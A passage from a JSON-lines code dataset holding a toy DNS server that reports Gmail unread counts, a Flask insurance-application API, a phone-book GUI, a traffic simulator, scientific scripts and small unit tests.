d\n\n class Question(object):\n def __init__(self, data, QDCOUNT):\n self.data = data\n self.QNAMES = []\n\n for q in range(QDCOUNT):\n p = 0\n fqdn = ''\n length = struct.unpack(\"!b\", data[p])[0]\n labels = []\n while length:\n labels.append(data[p+1:p+length+1])\n p += length + 1\n length = struct.unpack(\"!b\", data[p])[0]\n self.QNAMES.append( '.'.join(labels) )\n data = data[p+1:]\n\n self.QTYPE, self.QCLASS = struct.unpack(\"!HH\", data)\n \n #QTYPE should be 16 (TXT)\n #QTYPE should be 1 (IN)\n\n\n def __init__(self, data):\n self.header = Query.Header(data[:12])\n self.question = Query.Question(data[12:], self.header.NQUERIES)\n\n def getResponse(self): \n #res = \"yo yo yo 'sup %s\" % self.question.QNAMES[0].split('.')[0]\n\n count, subjects = getMsgsFromGmail()\n res = \"%d Unread. %s\" % (count, subjects)\n\n #ID, FLAGS, NQUERIES, NREPLIES, NNS, NADDRES\n resHeader = struct.pack('!6H', self.header.ID, 0x8000, 1, 1, 0, 0)\n resOrigQuery = self.question.data\n #NAME, TYPE: txt #CLASS: internet #TTL: no cache #RDLENGTH: length of next field\n resBody = struct.pack('!HHHIHB%ds' % len(res), 0xc00c, 16,1,0,len(res)+1,len(res),res)\n \n resParts = resHeader + resOrigQuery + resBody \n resData = ''.join(resParts)\n return resData\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n print(\"Usage: %s \" % sys.argv[0])\n else:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.bind(('0.0.0.0', 53))\n\n try:\n while True:\n (data, frm) = s.recvfrom(1024)\n query = Query(data)\n response = query.getResponse()\n s.sendto(response, frm)\n finally:\n s.close()\n\n\n","repo_name":"dgquintas/my-code-samples","sub_path":"python/dns/fakeDNS.py","file_name":"fakeDNS.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"15540295294","text":"import os\nnasm_env = Environment(tools = ['nasm'],\n ENV=os.environ,\n AS='nasm',\n ASFLAGS='',\n OBJSUFFIX=''\n )\n\n# print dir(env)\nnasm_env.StaticObject('boot', ['boot.s'],ASFLAGS='-f bin')\n# nasm_env.StaticObject('init.o', 'init.s',ASFLAGS=\"-f elf32\")\n\n\n\nImport('env') \n\nenv.GenerateKernelSize('config.h',['../../duck/init/kernel.elf'])\n\n\ninclude=[\n '.',\n 'include',\n '../../duck',\n '../../duck/platform/'+env['PLATFORM']\n]\n\nsource=['init.c','config.h']\n\nenv.Program('init.elf', \n source,\n CPPPATH=include,\n CFLAGS='$CFLAGS -fno-stack-protector -I. -Iinclude -Iarch -std=c99 -std=gnu99 -w ',\n LINKFLAGS= '$LINKFLAGS -T boot/x86/link.ld ') #-Ttext 0x0500 -Wl,-section-start=.apu_boot=0x1000\n\nenv.Objcopy('init.bin','init.elf',OBJCOPYFLAGS='-j .text -O binary -S')","repo_name":"evilbinary/YiYiYa","sub_path":"boot/x86/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":178,"dataset":"github-code","pt":"52"} +{"seq_id":"13799179426","text":"from flask import Flask, request, jsonify;from flask_sqlalchemy import SQLAlchemy\nimport enum;import requests;from datetime import datetime as dt\napp=Flask(__name__);app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///saryah.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False;db=SQLAlchemy(app)\nAD=db.session.add;CM=db.session.commit;FK=db.ForeignKey;RL=db.relationship\nC=db.Column;T=db.DateTime;I=db.Integer;S=db.String\nclass User(db.Model):\n id=C(I,primary_key=True);timestamp=C(T, server_default=db.func.now())\n apple_id=C(I, nullable=False, unique=True)\n email=C(S)\n full_name=C(S)\n def to_dict(self):\n return {key: getattr(self, key, None) for key in [\"id\",\"timestamp\",\"apple_id\",\"email\",\"full_name\"]}\nclass Sex(enum.Enum):F=\"female\";M=\"male\";O=\"other\"\nclass DriverIdType(enum.Enum):ID=\"id\";IQAMA=\"igama\"\nclass Driver(db.Model):\n id=C(I,primary_key=True);timestamp=C(T, server_default=db.func.now())\n first_name=C(S)\n last_name=C(S)\n sex=C(db.Enum(Sex), nullable=False, default=Sex.O)\n nationality=C(S)\n birthday=C(T)\n email=C(S)\n government_id=C(S, unique=True, nullable=False)\n government_id_type=C(db.Enum(DriverIdType), nullable=False)\n national_address=C(S)\n phone_NO=C(S, unique=True)\nclass CarIdType(enum.Enum):CHASSIS=\"chassis\";CUSTOMS=\"customs\"\nclass Car(db.Model):\n id=C(I, primary_key=True);timestamp=C(T, server_default=db.func.now())\n model=C(S)\n model_year=C(S)\n model_manufacturer=C(S)\n global_id=C(S, unique=True, nullable=False)\n global_id_type=C(db.Enum(CarIdType), nullable=False)\n plate_NO=C(S)\n color=C(S)\n body_type=C(S)\nclass Application(db.Model):\n id=C(I,primary_key=True);timestamp=C(T, server_default=db.func.now())\n user_id=C(I, FK(\"user.id\"), nullable=False)\n user=RL(\"User\", foreign_keys=[user_id], backref=\"applications\", lazy=True)\n driver_id=C(I, FK(\"driver.id\"), nullable=False)\n driver=RL(\"Driver\", foreign_keys=[driver_id], backref=\"applications\", lazy=True)\n car_id=C(I, FK(\"car.id\"), nullable=False)\n car=RL('Car', backref='applications', lazy=True)\nclass Transaction(db.Model):\n id = C(I, primary_key=True);timestamp = C(T, server_default=db.func.now())\n application_id=C(I, FK(\"application.id\"), nullable=False)\n application=RL(\"Application\", backref=\"transaction\", lazy=True)\n epow_id = C(I)\n transaction_at = C(T, default=db.func.now())\n subtotal_halalah = C(I)\n vat_halalah = db.ColumnProperty(0.15 * subtotal_halalah)\n total_halalah = db.ColumnProperty(subtotal_halalah + vat_halalah)\nclass Policy(db.Model):\n id=C(I,primary_key=True);timestamp=C(T, server_default=db.func.now())\n transaction_id = C(I, FK(\"transaction.id\"), nullable=False)\n transaction = RL('Transaction', backref='policy', lazy=True)\n provider = C(S)\n issue_at = C(T)\n effective_at = C(T)\n number = C(S)\n type = C(S)\ndef entity_from_json(model:db.Model, json):\n columns:[db.Column]=model.__dict__[\"__table__\"].columns;entity=model()\n for column in columns:\n c_name = column.name\n if c_name in json:\n if type(column.type)==db.Enum:\n column_enum = {l.value:l.name for l in column.type.__dict__[\"_valid_lookup\"]\n if type(type(l)) == enum.EnumMeta}\n entity.__setattr__(c_name, column_enum[json[c_name]])\n elif type(column.type)==db.DateTime: entity.__setattr__(c_name, dt.fromisoformat(json[c_name]))\n else: entity.__setattr__(c_name, json[c_name])\n return entity\ndef entity_to_dict(entity, level:int=0):\n if not entity:\n return None\n data = {col:str(entity.__getattribute__(col)) for col in entity.__table__.c.keys()}\n if level > 0:\n relations = [key for key in entity.__class__.__dict__.__getitem__(\"_sa_class_manager\").keys() if key not in data]\n for rel in relations:\n data[rel] = entity_to_dict(entity.__getattribute__(rel), level-1)\n return data\n# routs\n@app.route('/login', methods=['POST'])\ndef login():\n r=request.get_json(force=True)\n u=User.query.filter_by(apple_id=r[\"apple_id\"]).first()\n if not u:\n return jsonify({})\n return jsonify(entity_to_dict(u))\n@app.route('/sign_up', methods=['POST'])\ndef sign_up():\n request_data=request.get_json(force=True)\n u=User.query.filter_by(apple_id=request_data[\"apple_id\"]).first()\n if not u:\n del u;u=entity_from_json(User, request_data)\n AD(u);CM()\n return jsonify(entity_to_dict(u))\n@app.route(\"/application\", methods=[\"POST\"])\ndef application():\n request_data=request.get_json(force=True)\n req = requests.post(\"http://127.0.0.1:4999/person\",\n data= '{\"government_id\": %s ,\"car_id\": %s }' % (request_data[\"government_id\"],request_data[\"car_id\"]))\n if req.status_code != 200: return \"kyc failed\"\n kyc = req.json();del req\n user=User.query.filter_by(apple_id = request_data[\"apple_id\"]).first()\n car=entity_from_json(Car, dict(kyc[\"car\"], **request_data))\n driver = entity_from_json(Driver, dict(kyc[\"driver\"], **request_data))\n new_application=Application(user=user,car=car,driver=driver)\n AD(new_application);CM()\n return jsonify(entity_to_dict(new_application, 1))\n\nif __name__ == \"__main__\":\n db.drop_all()\n db.create_all()\n app.run(debug=False, port=5000 , host=\"0.0.0.0\")\n","repo_name":"kk-cycls/saryah-proxy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38639102109","text":"# encoding: utf-8\nimport PySimpleGUI as sg\n\nfrom backend.contact_statistics import collect_statistics\nfrom frontend.popups.popup_errors import popup_error_101, popup_error_102, popup_to_do, popup_error_103\nfrom frontend.popups.popup_question import popup_question_delete_contact\nfrom frontend.popups.popup_success import popup_success_add_contact\nfrom frontend.window_main import main_layout\nfrom frontend.window_book_list import window_add_contact\nfrom backend.files import write_file, path_file, get_name_in_file, get_contact_list_info, check_contact, strip_string, \\\n delete_one_element_list, read_lines\n\n\ndef main():\n # Criar as janelas inicias\n w_main, w_add_contact, popup_101 = main_layout(), None, None\n\n while True:\n window, event, values = sg.read_all_windows()\n\n # # Fechar tela\n if window == w_main and event == sg.WIN_CLOSED:\n break\n elif window == w_add_contact and event == sg.WIN_CLOSED:\n w_add_contact.close()\n w_main.enable()\n w_main.bring_to_front()\n\n if window == w_main:\n if event == 'btn_search':\n if len(values['in_search']) == 0:\n w_main.FindElement('li_values').Update(get_name_in_file(path_file()))\n else:\n popup_to_do(values)\n elif event == 'btn_reset':\n popup_to_do(values)\n elif event == 'btn_add':\n w_add_contact = window_add_contact()\n w_main.disable()\n elif event == 'btn_edit':\n # popup_to_do(values)\n read_lines()\n elif event == 'btn_delete':\n try:\n element_list = values['li_values'][0]\n pop_up_result = popup_question_delete_contact(element_list)\n if pop_up_result == 'Yes':\n\n # Remove\n delete_one_element_list(element_list)\n\n # # UPDATE APP\n\n # # Update contact info\n w_main.FindElement('contact_name').Update('')\n w_main.FindElement('contact_phone').Update('')\n w_main.FindElement('contact_celphone').Update('')\n w_main.FindElement('contact_sex').Update('')\n w_main.FindElement('contact_address').Update('')\n w_main.FindElement('contact_address_number').Update('')\n w_main.FindElement('contact_address_quarter').Update('')\n w_main.FindElement('contact_city').Update('')\n w_main.FindElement('contact_state').Update('')\n\n # # Update listbox\n w_main.FindElement('li_values').Update(get_name_in_file(path_file()))\n\n # update statistics\n list_len, m, f, n, m_percent, f_percent, n_percent = collect_statistics()\n w_main.FindElement('qtd_total').Update(list_len)\n w_main.FindElement('qtd_men').Update(m)\n w_main.FindElement('qtd_women').Update(f)\n w_main.FindElement('qtd_none').Update(n)\n w_main.FindElement('qtd_men_pct').Update(m_percent)\n w_main.FindElement('qtd_women_pct').Update(f_percent)\n w_main.FindElement('qtd_none_pct').Update(n_percent)\n\n except IndexError:\n 'list index out of range'\n popup_error_103(values)\n\n elif event == 'btn_delete_all':\n popup_to_do(values)\n elif event == 'li_values':\n if len(get_name_in_file(path_file())) > 0:\n element_list = values['li_values'][0]\n name, telephone, celphone, sex, address, address_number, address_quarter, city, state = get_contact_list_info(\n element_list)\n\n w_main.FindElement('contact_name').Update(name)\n w_main.FindElement('contact_phone').Update(telephone)\n w_main.FindElement('contact_celphone').Update(celphone)\n w_main.FindElement('contact_sex').Update(sex)\n w_main.FindElement('contact_address').Update(address)\n w_main.FindElement('contact_address_number').Update(address_number)\n w_main.FindElement('contact_address_quarter').Update(address_quarter)\n w_main.FindElement('contact_city').Update(city)\n w_main.FindElement('contact_state').Update(state)\n\n if window == w_add_contact:\n if window == w_add_contact:\n if event == 'btn_add':\n name = values['contact_name']\n\n validation = check_contact(name)\n\n if validation == 200:\n # print(\"Entrada válida\")\n\n # Tratamento dos inputs\n name = strip_string(values['contact_name'])\n telephone = strip_string(values['contact_phone'])\n celphone = strip_string(values['contact_celphone'])\n address = strip_string(values['contact_address'])\n address_number = strip_string(values['contact_address_number'])\n address_quarter = strip_string(values['contact_address_quarter'])\n city = strip_string(values['contact_city'])\n state = strip_string(values['contact_state'])\n if values['sex_male']:\n sex = 'Masculino'\n elif values['sex_female']:\n sex = 'Feminino'\n elif values['sex_none']:\n sex = 'Não definido'\n\n # print(values)\n\n write_file(path_file(), name, telephone, celphone, sex, address, address_number,\n address_quarter, city, state)\n w_main.FindElement('li_values').Update(get_name_in_file(path_file()))\n\n # update statistics\n list_len, m, f, n, m_percent, f_percent, n_percent = collect_statistics()\n w_main.FindElement('qtd_total').Update(list_len)\n w_main.FindElement('qtd_men').Update(m)\n w_main.FindElement('qtd_women').Update(f)\n w_main.FindElement('qtd_none').Update(n)\n w_main.FindElement('qtd_men_pct').Update(m_percent)\n w_main.FindElement('qtd_women_pct').Update(f_percent)\n w_main.FindElement('qtd_none_pct').Update(n_percent)\n\n popup_success_add_contact(values)\n w_add_contact.close()\n w_main.enable()\n w_main.bring_to_front()\n elif validation == 101:\n print('[ERRO 101] Já tem um contato com esse nome')\n popup_error_101(values)\n elif validation == 102:\n print(\"[ERRO 202] Contato não pode ser vazio\")\n popup_error_102(values)\n elif event == 'btn_return':\n w_add_contact.close()\n w_main.enable()\n w_main.bring_to_front()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gesmachado/phone_book","sub_path":"src/main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35571719408","text":"import random\nimport os\nos.system('cls')\n\nlistRandom = []\n\n\ndef tambahData(data):\n print(55*'-')\n panjangData = int(input(\"Masukkan Panjang data: \"))\n for i in range(panjangData):\n listRandom.append(random.randint(-25, 100))\n return data\n\n\ndef sortTertinggi(data):\n max = data[0]\n for i in range(1, len(data)):\n if data[i] > max:\n max = data[i]\n return max\n\n\ndef sortTerendah(data):\n max = data[0]\n for i in range(1, len(data)):\n if data[i] < max:\n max = data[i]\n return max\n\n\ndataRandom = tambahData(listRandom)\nlRandomTertinggi = sortTertinggi(dataRandom)\nlRandomTerendah = sortTerendah(dataRandom)\n\nprint(55*'-')\nprint(f\"Nilai Random : {dataRandom}\")\nprint(f\"Nilai terbesar: {lRandomTertinggi}\")\nprint(f\"Nilai terkecil: {lRandomTerendah}\")\nprint(55*'-')\n","repo_name":"FanoDre/Algoritma-Pemrograman2","sub_path":"pertemuan11/max.py","file_name":"max.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32889923817","text":"\nfrom ComplexCar import ComplexCar\nimport random\nimport numpy as np\n\nclass Road:\n\n\tdef __init__(self, numRoads):\n\t\tself.EWRoad = [(0, ComplexCar(0, 0))] * (3 + numRoads)\n\t\tself.NSRoad = [(0, ComplexCar(0,0))] * (3 + numRoads)\n\t\tself.done = False\n\t\tself.totalReward = 0\n\t\tself.carPositions = []\n\t\tself.numRoads = numRoads\n\t\tself.numCars = 0\n\n\tdef numCars(self):\n\t\treturn self.numCars\n\n\tdef putCar(self, road, pos, car):\n\t\tif road == 1:\n\t\t\tself.EWRoad[pos] = (1, car)\n\t\telse:\n\t\t\tself.NSRoad[pos] = (1, car)\n\n\tdef binaryRepresentation(self):\n\t\ttemp = np.array([bit[0] for bit in self.EWRoad])\n\t\ttemp2 = np.array([bit[0] for bit in self.NSRoad])\n\t\treturn np.array([temp, temp2])\n\n\n\tdef newInstance(self):\n\t\tself.EWRoad = [(0, ComplexCar(0,0))] * (3+ self.numRoads)\n\t\tself.NSRoad = [(0, ComplexCar(0,0))] * (3 + self.numRoads)\n\t\tself.done = False\n\n\n\tdef gameEnd(self):\n\t\treturn self.done\n\n\n\tdef getState(self):\n\t\tbinary = self.binaryRepresentation()\n\t\twait = []\n\t\tspeed = []\n\t\tfor i in range(self.numRoads + 3):\n\t\t\twait.append(self.EWRoad[i][1].wait_time)\n\t\t\tspeed.append(self.EWRoad[i][1].speed)\n\t\tfor i in range(self.numRoads + 3):\n\t\t\twait.append(self.NSRoad[i][1].wait_time)\n\t\t\tspeed.append(self.NSRoad[i][1].speed)\n\n\t\treturn np.array([binary, np.array(wait), np.array(speed)])\n\n\n\tdef crash(self):\n\t\tself.EWRoad = [(-1, ComplexCar(0,0))] * (3 + self.numRoads)\n\t\tself.NSRoad = [(-1, ComplexCar(0,0))] * (3 + self.numRoads)\n\n\tdef updateStep(self, stepNum):\n\t\tfor i in range(self.numRoads + 3):\n\t\t\tif(self.EWRoad[i][1].speed >= stepNum and self.EWRoad[i][0] == 1):\n\t\t\t\tcars = self.EWRoad[i - 1][0] + 1\n\t\t\t\tif(cars == 2):\n\t\t\t\t\treturn 0\n\t\t\t\tspeed = self.EWRoad[i][1].speed\n\t\t\t\twait_time = self.EWRoad[i][1].wait_time\n\t\t\t\tself.EWRoad[i - 1] = (cars, ComplexCar(wait_time, speed))\n\t\t\t\tself.EWRoad[i] = (0, ComplexCar(0,0))\n\t\tfor i in range(self.numRoads + 3):\n\t\t\tif(self.NSRoad[i][1].speed >= stepNum and self.NSRoad[i][0] == 1):\n\t\t\t\tcars = self.NSRoad[i - 1][0] + 1\n\t\t\t\tif(cars == 2):\n\t\t\t\t\treturn 0\n\t\t\t\tspeed = self.NSRoad[i][1].speed\n\t\t\t\twait_time = self.NSRoad[i][1].wait_time\n\t\t\t\tself.NSRoad[i - 1] = (cars, ComplexCar(wait_time, speed))\n\t\t\t\tself.NSRoad[i] = (0, ComplexCar(0,0))\n\t\tif(self.EWRoad[1][0] == 1) and (self.NSRoad[1][0] == 1):\n\t\t\treturn 0\n\t\treturn 1\n\n\n\tdef step(self, pos, action):\n\t\tself.EWRoad[pos][1].drive(action)\n\t\treward = 0\n\t\twait = self.EWRoad[pos][1].wait_time\n\t\treward += (-2 + -2 * wait)\n\t\toutput = []\n\t\tchance = random.random()\n\t\t#list - 1\n\t\tfinishCar = self.EWRoad.pop(0)\n\t\tfinishCarNS = self.NSRoad.pop(0)\n\t\tself.EWRoad.insert(0, (0,ComplexCar(0,0)))\n\t\tself.NSRoad.insert(0, (0,ComplexCar(0,0)))\n\t\tif(finishCar[0] == 1):\n\t\t\tdone = True\n\t\t\treward += 40\n\t\tupdate = self.updateStep(1)\n\t\tif(update == 0):\n\t\t\tself.crash()\n\t\t\tself.done = True\n\t\t\tself.totalReward = -100\n\t\t\treturn reward\n\n\t\tfinishCar2 = self.EWRoad.pop(0)\n\t\tfinishCarNS2 = self.NSRoad.pop(0)\n\t\tself.EWRoad.insert(0, (0, ComplexCar(0,0)))\n\t\tself.NSRoad.insert(0, (0,ComplexCar(0,0)))\n\t\tif(finishCar2[0] == 1):\n\t\t\tdone = True\n\t\t\treward += 40\n\t\tupdate = self.updateStep(2)\n\t\tif(update == 0):\n\t\t\tself.crash()\n\t\t\tself.done = True\n\t\t\tself.totalReward = -100\n\t\t\treturn reward\n\n\t\tif(self.EWRoad[1][0] == 1) and (self.NSRoad[1][0] == 1):\n\t\t\tself.crash()\n\t\t\tself.done = True\n\t\t\tself.totalReward = -100\n\t\t\treturn reward\n\n\t\t'''if self.sections[len(self.sections) - 1][0] == 0:\n\t\t\tif (chance <= self.prob):\n\t\t\t\tself.sections[len(self.sections) - 1] = (1, ComplexCar(0,2))\n\t\t\t\tself.numCars += 1'''\n\t\tself.totalReward += reward\n\t\treturn reward\n\n\n\n\n\t\n \n\n","repo_name":"ataozhou/Traffic_Controller","sub_path":"IntersectionSpeed/TestingRoad.py","file_name":"TestingRoad.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15260035128","text":"# Simulation mechanoreceptor grid and receptive fields of afferents\r\n# ADEL PARVIZI-FARD\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom scipy import signal\r\nimport random\r\nfrom IPython import get_ipython\r\nfrom scipy.signal import find_peaks\r\nget_ipython().run_line_magic('matplotlib', 'qt')\r\n\r\n# %%\r\n# (Parameters) #####################\r\n\r\nn = 5 # patch of skin dimension\r\nm = 5\r\nun_in = []\r\n\r\nrrr = [1, 3, 7, 9] # on average innervated taxels\r\nnnn = [1, 3, 5, 9]\r\nrrr = [3]\r\nnnn = [3]\r\n\r\nfor rr, nn in zip(rrr, nnn):\r\n N_MR = rr\r\n #\r\n R = nn\r\n #\r\n N = 18\r\n\r\n # create receptive field for afferents ######################################\r\n\r\n RF = np.zeros((n, m, N))\r\n random.seed(6227)\r\n np.random.seed(144457)\r\n\r\n index1 = np.arange(N)\r\n random.shuffle(index1)\r\n random.shuffle(index1)\r\n\r\n print(index1)\r\n center = []\r\n jiter = 1\r\n space = 1\r\n for j in range(5):\r\n for t1 in range(4):\r\n center.append([t1 * space + n / 5] + [j * space + m / 5])\r\n x0_y0_SA = np.array(center)\r\n\r\n RR = 5\r\n for i in range(N):\r\n x1 = np.random.normal(int(x0_y0_SA[i, 0]), R / RR, N_MR)\r\n y = np.random.normal(int(x0_y0_SA[i, 1]), R / RR, N_MR)\r\n x1 = x1.astype(int)\r\n y = y.astype(int)\r\n iii = np.where((x1 < 0))\r\n x1[iii] = 0\r\n iii = np.where((x1 > m - 1))\r\n x1[iii] = m - 1\r\n iii = np.where((y < 0))\r\n y[iii] = 0\r\n iii = np.where((y > n - 1))\r\n y[iii] = n - 1\r\n for j in range(len(x1)):\r\n RF[y[j], x1[j], index1[i]] = random.uniform(0.1, 0.8)\r\n\r\n random.seed(42123)\r\n numbers = np.arange(N)\r\n\r\n SA_index = numbers[0:int(1 * N / 3)]\r\n RA_index = numbers[int(1 * N / 3):N]\r\n RF_1 = np.zeros((n, m))\r\n\r\n#%% plot individual receptive field of each afferent\r\n for j in range(N):\r\n plt.subplot(4, 5, j + 1)\r\n RF_1 += RF[:, :, j]\r\n plt.imshow(RF[:, :, j], extent=([0, n, 0, m]), vmin=0, vmax=1)\r\n plt.title('#{}'.format(j + 1))\r\nplt.figure(2)\r\nplt.imshow(RF_1, extent=([0, n, 0, m]),vmin=0,vmax=max(RF_1.ravel()))\r\nplt.show()\r\n\r\n# %% convert Receptive fields to text file for interface board\r\nf = open(\"RF_Arduino_6.txt\", \"w\")\r\nfor j in range(N):\r\n f.write('float RF{0}[25]={{{1}}};\\n'.format(j + 1, str(list(np.array(RF[:, :, j]).flatten()))[1:-1]))\r\nf.close()","repo_name":"Research-lab-KUMS/Sharpness-Recognition","sub_path":"RF_Creation.py","file_name":"RF_Creation.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8494999861","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import crystalball\nimport uproot\nimport numpy as np\nimport math\n\ninput_file = uproot.open(\"trkana.Triggered.root\")\ninput_tree = input_file[\"TrkAnaNeg/trkana\"]\ndf = input_tree.pandas.df(flatten = False)\n\nfile2 = uproot.open(\"reco-Delta40-trig.root\")\nRPCReco2 = file2[\"TrkAnaNeg/trkana\"]\ndf2 = RPCReco2.pandas.df(flatten=False)\n\ndframes = [df, df2]\n\n\n\nresult = pd.concat(dframes)\n\n\ndef function1(x, alpha, n, mu, sigma):\n expArg = -0.5 * pow(abs(alpha), 2.)\n gauss = math.exp(expArg)\n\n A = pow((n / abs(alpha)), n) * gauss\n B = (n / abs(alpha)) - abs(alpha)\n C = n / ((abs(alpha) * (n - 1.))) * gauss\n D = math.sqrt(math.pi / 2.) * (1. + math.erf((abs(alpha) / math.sqrt(2.))))\n N = 1. / (sigma * (C + D))\n\n return (N * math.exp(-1 * (pow((x - mu), 2) / (2 * pow(sigma, 2)))))\n\n\n\ndef function2(x, alpha, n, mu, sigma):\n expArg = -0.5 * pow(abs(alpha), 2.)\n gauss = math.exp(expArg)\n\n A = pow((n / abs(alpha)), n) * gauss\n B = (n / abs(alpha)) - abs(alpha)\n C = n / ((abs(alpha) * (n - 1.))) * gauss\n D = math.sqrt(math.pi / 2.) * (1. + math.erf((abs(alpha) / math.sqrt(2.))))\n N = 1. / (sigma * (C + D))\n\n return (N * A * pow((B - (x - mu) / sigma), -n))\n\n\ndef piecewise(x, alpha, n, mu, sigma):\n return np.piecewise(x,[(x - mu) / sigma > -alpha,(x - mu) / sigma >= -alpha ],[function1(x, alpha, n, mu, sigma), function2(x, alpha, n, mu, sigma)])\n\n\n\n\ndata1 = df[\"deent.mom\"]\ndata = result[\"deent.mom\"]\n\ny, bins = np.histogram(data1, bins=200);\n\n# Convert histogram into a classical plot\ndx = bins[1]-bins[0]\nx = np.linspace(bins[0]+dx/2, bins[-1]-dx/2, 200)\n\npar1 = [5,2,48,5]\n#par1 = [alpha, n, mu, sigma, scale]\n\n#par1 = [5,2,48,5,85000]\n\n\n\n\n\nplt.hist(data1, bins=100, label='data')\npopt,pcov = curve_fit(piecewise, x,y, p0 = [*par1])\nplt.plot(x, piecewise(x,*par1), )\nplt.plot(x, piecewise(x,*popt), ':r')\nplt.show()\n","repo_name":"josephinetsai/Mu2e","sub_path":"piecewise.py","file_name":"piecewise.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70514754084","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 20 12:28:56 2018\n\n@author: libertyaskew\n\"\"\"\n'''\nimport numpy as np\n\ndef discUnifSamp(n,N):\n probN = [float(i)/(N) for i in range(N)]\n sampU = [random.random() for i in range(n)]\n isGreater = [sum([bbL:\n k = k+1\n p = p*random.random()\n return k-1\n\nprint (poissonSamp_exp1(0.8))\n\ndef poissonSamp_exp(n , lam):\n return [ poissonSamp_exp1(lam) for i in range (n)]\n\nprint (poissonSamp_exp(6 , 2))","repo_name":"liberty-askew/MainProjects","sub_path":"MonteCarlo/PoissonDist.py","file_name":"PoissonDist.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3407591160","text":"import os\n\nfrom django.core.management import call_command\nfrom django.test import TestCase\n\nfrom ..models import ScriptVersion\n\nfrom . import config\nfrom . import mixins\n\n\nclass CommandTests(mixins.ScriptFactoryMixin, TestCase):\n def setUp(self):\n # don't setup scripts, but we want to still tear down after each test\n pass\n\n def test_addscript(self):\n call_command(\n \"addscript\", os.path.join(config.WOOEY_TEST_SCRIPTS, \"translate.py\")\n )\n # Test we can update the script\n script_version = ScriptVersion.objects.latest(\"created_date\")\n old_parameters = list(script_version.get_parameters())\n call_command(\n \"addscript\",\n \"--name\",\n \"translate\",\n os.path.join(config.WOOEY_TEST_SCRIPTS, \"translate2.py\"),\n )\n new_version = ScriptVersion.objects.latest(\"created_date\")\n\n # make sure we updated\n self.assertEqual(\n new_version.script_iteration, script_version.script_iteration + 1\n )\n\n # Make sure the parameters have not changed\n self.assertListEqual(old_parameters, list(new_version.get_parameters()))\n\n # Make sure we don't duplicate\n call_command(\n \"addscript\",\n \"--name\",\n \"translate\",\n os.path.join(config.WOOEY_TEST_SCRIPTS, \"translate2.py\"),\n )\n newest_version = ScriptVersion.objects.latest(\"created_date\")\n self.assertEqual(new_version.pk, newest_version.pk)\n","repo_name":"wooey/Wooey","sub_path":"wooey/tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":2006,"dataset":"github-code","pt":"52"} +{"seq_id":"40377514701","text":"import unittest\nfrom tp1 import Stuff\n\nclass TestInitIsEmpty(unittest.TestCase):\n\tdef test_init_is_empty(self):\n\t\tstuff = Stuff()\n\t\tself.assertEqual([], stuff.refs())\n\nclass TestAddRefs(unittest.TestCase):\n\tdef test_add_one_ref(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\tself.assertEqual([123], stuff.refs())\n\n\tdef test_add_multiple_refs(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\tstuff.add_ref(456)\n\t\tself.assertTrue(123 in stuff.refs())\n\t\tself.assertTrue((456 in stuff.refs()))\n\n\tdef test_cant_add_existing_ref(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\twith self.assertRaises(ValueError) :\n\t\t\tstuff.add_ref(123)\n\nclass TestDeleteRefs(unittest.TestCase):\n\tdef test_delete_existing_ref(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\tstuff.del_ref(123)\n\t\tself.assertEqual([], stuff.refs())\n\n\tdef test_cant_delete_not_existing_ref(self):\n\t\tstuff = Stuff()\n\t\twith self.assertRaises(ValueError):\n\t\t\tstuff.del_ref(123)\n\n\tdef test_cant_delete_ref_with_item(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\tstuff.add_item_ref(123, 15)\n\t\twith self.assertRaises(ValueError):\n\t\t\tstuff.del_ref(123)\n\nclass TestAddItems(unittest.TestCase):\n\tdef test_add_items(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\tstuff.add_item_ref(123, 15)\n\t\tstuff.add_item_ref(123, 15)\n\t\tself.assertEqual(30, stuff.items_ref(123))\n\n\tdef test_cant_add_item_in_unexisting_ref(self):\n\t\tstuff = Stuff()\n\t\tstuff.add_ref(123)\n\t\twith self.assertRaises(ValueError):\n\t\t\tstuff.add_item_ref(456, 15)","repo_name":"ig1na/SVL-M1","sub_path":"TP1/test_stuff.py","file_name":"test_stuff.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8925545031","text":"# coding: 